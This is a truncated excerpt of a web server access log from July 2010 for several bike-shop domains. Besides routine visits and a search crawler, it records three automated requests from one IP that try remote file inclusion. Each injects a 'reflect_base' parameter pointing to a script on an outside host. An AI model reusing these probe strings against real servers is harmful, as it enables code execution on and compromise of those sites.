208.80.193.35 - - [13/Jul/2010:19:30:18 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:19:36:26 -0700] "GET /logs/access.log/?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [13/Jul/2010:19:36:26 -0700] "GET /?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [13/Jul/2010:19:36:27 -0700] "GET /logs/?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 200 2940 "-" "libwww-perl/5.803" "houstonbikeshop.com"
67.195.112.217 - - [13/Jul/2010:20:02:17 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [13/Jul/2010:20: